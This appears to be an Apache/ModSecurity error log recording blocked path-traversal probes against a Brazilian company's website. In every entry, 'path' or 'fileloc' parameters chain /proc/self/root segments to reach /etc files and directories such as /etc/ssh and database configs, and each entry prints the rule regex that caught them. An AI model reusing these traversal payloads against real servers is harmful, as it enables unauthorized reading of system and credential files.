[Tue Mar 17 11:07:05.143171 2026] [:error] [pid 2473:tid 140411540502272] [client 74.7.243.203:46110] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgCaBJNF7axNlVR0UGJwAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:06.211010 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.241.46:49920] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgCqBJNF7axNlVR0UGKAAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:07:06.366431 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.243.203:46116] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgCqBJNF7axNlVR0UGKgAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:07.874379 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.243.203:46124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgCweiSKl8TjouI-YKdwAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:09.203935 2026] [:error] [pid 8856:tid 140411607643904] [client 74.7.243.203:46138] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgDXUHeC6oxrTQ0VC3iwAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:10.430020 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.243.203:34278] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgDqBJNF7axNlVR0UGLgAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:11.745474 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.243.203:34292] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgDweiSKl8TjouI-YKegAAA80"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:13.003473 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.243.203:34296] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgEQeiSKl8TjouI-YKfQAAA8s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:14.298850 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.243.203:34302] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgEgeiSKl8TjouI-YKgAAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:16.960136 2026] [:error] [pid 1016:tid 140411708356352] [client 74.7.243.203:34308] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgE5qmL8PQht4WJFlQ8AAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:19.242809 2026] [:error] [pid 9155:tid 140411599251200] [client 74.7.243.203:34310] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgFtbI7zhHXcabyMUuxAAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:20.547080 2026] [:error] [pid 7437:tid 140411582465792] [client 74.7.243.203:52192] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgGAeiSKl8TjouI-YKiQAAA9M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:21.831627 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.243.203:52198] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgGQeiSKl8TjouI-YKjAAAA80"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:24.140075 2026] [:error] [pid 1016:tid 140411683178240] [client 74.7.243.203:52212] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgG5qmL8PQht4WJFlQ8wAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:26.544308 2026] [:error] [pid 17965:tid 140411674785536] [client 74.7.243.203:52218] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgHqt8Nd0UC_OcbVG5qQAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:28.928683 2026] [:error] [pid 8856:tid 140411641214720] [client 74.7.243.203:52230] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgIHUHeC6oxrTQ0VC3kQAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:30.240939 2026] [:error] [pid 2325:tid 140411641214720] [client 74.7.243.203:33820] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgIu82sZHvlq4xgHrNggAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:31.399158 2026] [:error] [pid 1016:tid 140411649607424] [client 74.7.243.203:33824] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgI5qmL8PQht4WJFlQ9QAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:32.757227 2026] [:error] [pid 8856:tid 140411557287680] [client 74.7.243.203:33832] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgJHUHeC6oxrTQ0VC3kgAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:34.158151 2026] [:error] [pid 11293:tid 140411716749056] [client 74.7.243.203:33848] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgJtCmCSWTlPouqorVwwAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:35.347203 2026] [:error] [pid 8856:tid 140411607643904] [client 74.7.243.203:33862] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgJ3UHeC6oxrTQ0VC3kwAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:38.681390 2026] [:error] [pid 18709:tid 140411691570944] [client 74.7.243.203:33876] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgKjarLhPAjZGI1b24FwAAA4Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
